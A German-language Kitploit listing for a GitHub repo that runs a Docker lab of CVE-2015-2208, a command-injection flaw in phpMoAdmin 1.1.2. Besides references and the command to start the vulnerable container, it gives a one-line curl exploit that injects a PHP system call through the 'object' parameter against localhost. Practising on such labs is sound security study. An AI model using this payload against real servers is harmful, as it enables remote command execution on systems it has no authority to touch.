Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2015-2208 — Docker simulating cve-2015-2208 vulnerability | Kitploit
Tools/GitHubGitHub/ptantiku/cve-2015-2208
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubptantiku/cve-2015-2208

cve-2015-2208

Docker simulating cve-2015-2208 vulnerability

Repository anzeigen
2vor 11 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

#Dockerfile zur Simulation der Umgebung für CVE-2015-2208#

Die Funktion saveObject in moadmin.php in phpMoAdmin 1.1.2 erlaubt entfernten Angreifern die Ausführung beliebiger Befehle über Shell-Metazeichen im Parameter object.

Entdeckt von: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

Referenzen:

  • http://seclists.org/fulldisclosure/2015/Mar/19
  • http://www.exploit-db.com/exploits/36251/
  • https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2208

##Testumgebung##

root@kitploit:~
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##Exploit##

root@kitploit:~
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'
Tool herunterladen